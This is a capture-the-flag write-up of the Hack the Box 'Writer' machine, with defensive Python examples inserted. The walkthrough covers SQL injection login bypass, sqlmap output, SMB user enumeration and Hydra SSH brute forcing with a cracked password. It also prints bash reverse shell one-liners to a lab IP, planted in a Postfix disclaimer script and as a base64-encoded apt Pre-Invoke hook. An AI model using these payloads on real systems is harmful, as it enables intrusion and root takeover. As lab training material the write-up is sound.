BlueDolphin

Hack the Box - Writer

Updated: Apr 20, 2022

Engagement flow
Summary

This was a cool but confusing lab. I found myself trying many different paths and was constantly unsure of what to do next. We started off with some SQL injection, which allowed us to collect files off the backend host. However, I initially found nothing helpful but the web server code. This Python code allegedly had a vulnerability in it, but instead I used RPC enumeration over SMB to find a username and then SSH bruteforcing with Hydra to get an initial foothold. From here we pivoted and elevated our privileges to a more advanced user via excessive group privileges on a Postfix email disclaimer tool. We were able to add custom code to the disclaimer script, which executes to tag every outgoing email with a disclaimer.


Finally we pivoted to root, where we targeted the cron jobs and again found excessive permissions on apt.conf.d. From here we followed a known GTFOBins exploit to inject OS commands into the apt update process due to improper input handling.

Processes/Techniques
  • SQL injection

  • RPC enumeration

  • SSH bruteforcing

  • Cron job manipulation

  • Postfix disclaimer injection

  • GTFO bins

References

Tools used
  • Dirbuster

  • Burpsuite

  • Burp repeater

  • Linpeas

  • Hydra

  • SQLmap

  • Enum4linux


Enumeration

└─$ nmap 10.129.176.17

Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-14 12:58 EST

Nmap scan report for 10.129.176.17

Host is up (0.083s latency).

Not shown: 996 closed ports

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

139/tcp open netbios-ssn

445/tcp open microsoft-ds



In depth scan


└─$ nmap 10.129.176.17 -sC -sV

Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-14 13:00 EST

Nmap scan report for 10.129.176.17

Host is up (0.078s latency).

Not shown: 996 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 3072 98:20:b9:d0:52:1f:4e:10:3a:4a:93:7e:50:bc:b8:7d (RSA)

| 256 10:04:79:7a:29:74:db:28:f9:ff:af:68:df:f1:3f:34 (ECDSA)

|_ 256 77:c4:86:9a:9f:33:4f:da:71:20:2c:e1:51:10:7e:8d (ED25519)

80/tcp open http Apache httpd 2.4.41 ((Ubuntu))

|_http-server-header: Apache/2.4.41 (Ubuntu)

|_http-title: Story Bank | Writer.HTB

139/tcp open netbios-ssn Samba smbd 4.6.2

445/tcp open netbios-ssn Samba smbd 4.6.2

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Host script results:

|_nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

| smb2-security-mode:

| 2.02:

|_ Message signing enabled but not required

| smb2-time:

| date: 2022-01-14T18:00:24

|_ start_date: N/A


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 17.04 seconds


Web Enumeration

We jump into web enumeration and find a pretty simple site with nothing interactive. We add the writer.htb hostname and the site does not resolve any differently.



Running dirbuster reveals an interesting directory to enumerate.


Dirbuster /administrative/



SQL login bypass

Browsing to the web page provides a simple login form that we are able to bypass with a basic SQL injection payload.


1 or 1=1-- -
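To show why a one-line payload like the one above gets past the form, here is an added example (not code from this write-up or from the Writer box) that builds the login query by string formatting, feeds it a string-context variant of the page's payload, and then shows the parameterised form rejecting the same input. The users table, the credentials and the use of SQLite are constructed for the demo.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the login table behind the form; not the box's schema.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (uname TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return con

def login_vulnerable(con, uname, password):
    # Query text is assembled from user input, so quotes and comment markers
    # change the statement: the trailing '-- -' comments out the password check.
    sql = (f"SELECT uname FROM users WHERE uname = '{uname}' "
           f"AND password = '{password}'")
    return con.execute(sql).fetchone() is not None

def login_safe(con, uname, password):
    # Placeholders bind the input as data; the payload is compared as a literal string.
    sql = "SELECT uname FROM users WHERE uname = ? AND password = ?"
    return con.execute(sql, (uname, password)).fetchone() is not None

# String-context form of the page's payload (the form was hit with: 1 or 1=1-- -).
PAYLOAD = "admin' or 1=1-- -"

def demo():
    con = make_db()
    return {
        "vulnerable_bypassed": login_vulnerable(con, PAYLOAD, "wrong"),
        "safe_bypassed": login_safe(con, PAYLOAD, "wrong"),
        "safe_valid_login": login_safe(con, "admin", "correct-horse"),
    }

if __name__ == "__main__":
    print(demo())
```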



SQL Map vulnerable login form

Having exploited the page, we can investigate further by catching the request with Burp and saving it for automated testing with sqlmap.

I used sqlmap at a basic level on our saved request with the command below. We learn that the backend DB is running MySQL.


sqlmap -r login


We take this further and call the --os-shell function, which is a lazy way to capitalize on an already automated tool, but we have no success.


└─$ sqlmap -r login -D MYSQL --os-shell


[20:40:31] [INFO] parsing HTTP request from 'login'

[20:40:31] [INFO] resuming back-end DBMS 'mysql'

[20:40:31] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: uname (POST)

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: uname=admin' AND (SELECT 2214 FROM (SELECT(SLEEP(5)))mXhp) AND 'iGix'='iGix&password=admin

---

[20:40:31] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 19.10 or 20.04 (focal or eoan)

web application technology: Apache 2.4.41

back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

[20:40:31] [INFO] going to use a web backdoor for command prompt

[20:40:31] [INFO] fingerprinting the back-end DBMS operating system

[20:40:34] [INFO] the back-end DBMS operating system is Linux

which web application language does the web server support?

[1] ASP

[2] ASPX

[3] JSP

[4] PHP (default)

> whoami

[20:40:37] [WARNING] invalid value, only digits are allowed

which web application language does the web server support?

[1] ASP

[2] ASPX

[3] JSP

[4] PHP (default)

> 4

do you want sqlmap to further try to provoke the full path disclosure? [Y/n] Y

[20:40:45] [WARNING] unable to automatically retrieve the web server document root

what do you want to use for writable directory?

[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)

[2] custom location(s)

[3] custom directory list file

[4] brute force search

> 1

[20:40:53] [WARNING] unable to automatically parse any web server path

[20:40:53] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method

[20:40:53] [WARNING] unable to upload the file stager on '/var/www/'

[20:40:53] [INFO] trying to upload the file stager on '/var/www/administrative/' via LIMIT 'LINES TERMINATED BY' method

[20:40:54] [WARNING] unable to upload the file stager on '/var/www/administrative/'

[20:40:54] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method

[20:40:54] [WARNING] unable to upload the file stager on '/var/www/html/'

[20:40:54] [INFO] trying to upload the file stager on '/var/www/html/administrative/' via LIMIT 'LINES TERMINATED BY' method

[20:40:55] [WARNING] unable to upload the file stager on '/var/www/html/administrative/'

[20:40:55] [INFO] trying to upload the file stager on '/var/www/htdocs/' via LIMIT 'LINES TERMINATED BY' method

[20:40:56] [WARNING] unable to upload the file stager on '/var/www/htdocs/'

[20:40:56] [INFO] trying to upload the file stager on '/var/www/htdocs/administrative/' via LIMIT 'LINES TERMINATED BY' method

[20:40:56] [WARNING] unable to upload the file stager on '/var/www/htdocs/administrative/'

[20:40:56] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method

[20:40:57] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/'

[20:40:57] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/administrative/' via LIMIT 'LINES TERMINATED BY' method

[20:40:58] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/administrative/'

[20:40:58] [INFO] trying to upload the file stager on '/usr/local/www/data/' via LIMIT 'LINES TERMINATED BY' method

[20:40:58] [WARNING] unable to upload the file stager on '/usr/local/www/data/'

[20:40:58] [INFO] trying to upload the file stager on '/usr/local/www/data/administrative/' via LIMIT 'LINES TERMINATED BY' method

[20:40:59] [WARNING] unable to upload the file stager on '/usr/local/www/data/administrative/'

[20:40:59] [INFO] trying to upload the file stager on '/var/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method

[20:41:00] [WARNING] unable to upload the file stager on '/var/apache2/htdocs/'

[20:41:00] [INFO] trying to upload the file stager on '/var/apache2/htdocs/administrative/' via LIMIT 'LINES TERMINATED BY' method

[20:41:00] [WARNING] unable to upload the file stager on '/var/apache2/htdocs/administrative/'

[20:41:00] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via LIMIT 'LINES TERMINATED BY' method

[20:41:01] [WARNING] unable to upload the file stager on '/var/www/nginx-default/'

[20:41:01] [INFO] trying to upload the file stager on '/var/www/nginx-default/administrative/' via LIMIT 'LINES TERMINATED BY' method

[20:41:02] [WARNING] unable to upload the file stager on '/var/www/nginx-default/administrative/'

[20:41:02] [INFO] trying to upload the file stager on '/srv/www/htdocs/' via LIMIT 'LINES TERMINATED BY' method

[20:41:02] [WARNING] unable to upload the file stager on '/srv/www/htdocs/'

[20:41:02] [INFO] trying to upload the file stager on '/srv/www/htdocs/administrative/' via LIMIT 'LINES TERMINATED BY' method

[20:41:03] [WARNING] unable to upload the file stager on '/srv/www/htdocs/administrative/'

[20:41:03] [INFO] trying to upload the file stager on '/usr/local/var/www/' via LIMIT 'LINES TERMINATED BY' method

[20:41:04] [WARNING] unable to upload the file stager on '/usr/local/var/www/'

[20:41:04] [INFO] trying to upload the file stager on '/usr/local/var/www/administrative/' via LIMIT 'LINES TERMINATED BY' method

[20:41:05] [WARNING] unable to upload the file stager on '/usr/local/var/www/administrative/'

[20:41:05] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) - 1 times, 404 (Not Found) - 85 times

[20:41:05] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/writer.htb'


[*] ending @ 20:41:05 /2022-01-14/


So we try the other available flags, and the privileges flag shows that the database user has the FILE privilege. We could use sqlmap to download files with this, which I did, but I could not spot the vulnerability in the Python code.


sqlmap -r login --privilege


[13:01:29] [INFO] fetching database users privileges
[13:01:29] [INFO] fetching database users
[13:01:29] [INFO] fetching number of database users
[13:01:29] [INFO] retrieved: 1
[13:01:35] [INFO] retrieved: 
[13:01:40] [INFO] adjusting time delay to 2 seconds due to good response times
'admin'@'localhost'
[13:04:05] [INFO] fetching number of privileges for user 'admin'
[13:04:05] [INFO] retrieved: 1
[13:04:08] [INFO] fetching privileges for user 'admin'
[13:04:08] [INFO] retrieved: FILE
database management system users privileges:
[*] %admin% [1]:
    privilege: FILE

[13:04:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.129.176.255'

[*] ending @ 13:04:33 /2022-01-16/

RPC client enumeration

We find a username with RPC enumeration.


└─$ rpcclient -U '' -N writer.htb

rpcclient $> srvinfo

WRITER Wk Sv PrQ Unx NT SNT writer server (Samba, Ubuntu)

platform_id : 500

os version : 6.1

server type : 0x809a03

rpcclient $> enumdomusers

user:[kyle] rid:[0x3e8]

rpcclient $>



SSH Bruteforce with Hydra

We take our username, select rockyou.txt as the wordlist and get started.


kyle:marcoantonio


Privilege escalation

So we arrive as user kyle and need to escalate our privileges.

Looking at the group information we see that we are a part of the filter group, so we dive in to learn what that gives us access to.


Attempting to view the files that the group "filter" had access to produced a ton of errors!


So I appended 2>/dev/null to suppress the errors in the terminal.


Having learned that we have special permissions on disclaimer, we check out the files within.


List all files and check permissions


What is Postfix?

Postfix is a popular open-source Mail Transfer Agent (MTA) that can be used to route and deliver email on a Linux system. It is estimated that around 25% of public mail servers on the internet run Postfix.


Checking the local listening ports confirms port 25 is open, which is the port used by the mail service.



Examine master.cf


workflow


  1. add rev shell

  2. Check if mail server is running

  3. connect to mail server with netcat

  4. ehlo

  5. mail from: kyle@writer.htb

  6. RCPT TO: root@writer.htb

  7. DATA

  8. subject: boom mail

  9. booooom

#!/bin/sh

bash -c 'bash -i >& /dev/tcp/10.10.14.123/6363 0>&1'


Establish persistence

We download John's SSH key and, boom, we have persistence.

We start our enumeration by looking at group info.


This leads us down to a GTFOBins-related exploit, which can be read about further at this link.


We tailor a payload that does not initially work; however, base64 encoding it passes successfully.

/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.123/5353 0>&1"


L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIzLzUzNTMgMD4mMSI=


echo 'apt::Update::Pre-Invoke {"L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIzLzUzNTMgMD4mMSI= | base64 -d | bash"};'
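As an added defender-side check (not code from this write-up or from the Writer box), the Python audit below flags the two misconfigurations that carried the last two escalations: a Postfix disclaimer script writable by a non-root group, and apt.conf.d fragments that are writable by group/other or that register Pre-Invoke/Post-Invoke hooks, which apt runs as root. The directory, file names and contents are a constructed fixture in a temporary directory, not the box's real files.

```python
import os
import re
import stat
import tempfile

# apt executes these hooks as root during 'apt update', so any fragment setting one deserves a look.
HOOK_RE = re.compile(r"(Pre|Post)-Invoke", re.IGNORECASE)

def writable_by_others(path):
    # Files a root-run service executes or parses should be writable by root only.
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit(paths):
    findings = []
    for path in paths:
        entries = ([os.path.join(path, f) for f in sorted(os.listdir(path))]
                   if os.path.isdir(path) else [path])
        for entry in entries:
            if not os.path.isfile(entry):
                continue
            if writable_by_others(entry):
                findings.append((entry, "writable by group/other"))
            with open(entry, errors="replace") as fh:
                for n, line in enumerate(fh, 1):
                    if HOOK_RE.search(line):
                        findings.append((entry, f"line {n}: apt invoke hook: {line.strip()}"))
    return findings

def demo():
    # Constructed fixture: a benign apt.conf.d fragment, a group-writable fragment that
    # registers a Pre-Invoke hook, and a group-writable disclaimer script (placeholder paths).
    root = tempfile.mkdtemp()
    confd = os.path.join(root, "apt.conf.d")
    os.mkdir(confd)
    files = {
        os.path.join(confd, "20auto-upgrades"): ('APT::Periodic::Update-Package-Lists "1";\n', 0o644),
        os.path.join(confd, "99-hook"): ('apt::Update::Pre-Invoke {"/tmp/placeholder.sh"};\n', 0o664),
        os.path.join(root, "disclaimer"): ("#!/bin/sh\n# placeholder disclaimer script\n", 0o775),
    }
    for path, (content, mode) in files.items():
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, mode)
    return audit([confd, os.path.join(root, "disclaimer")])

if __name__ == "__main__":
    for entry, msg in demo():
        print(f"{entry}: {msg}")
```

On a real host you would point audit() at /etc/apt/apt.conf.d and the script referenced from master.cf instead of the fixture.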
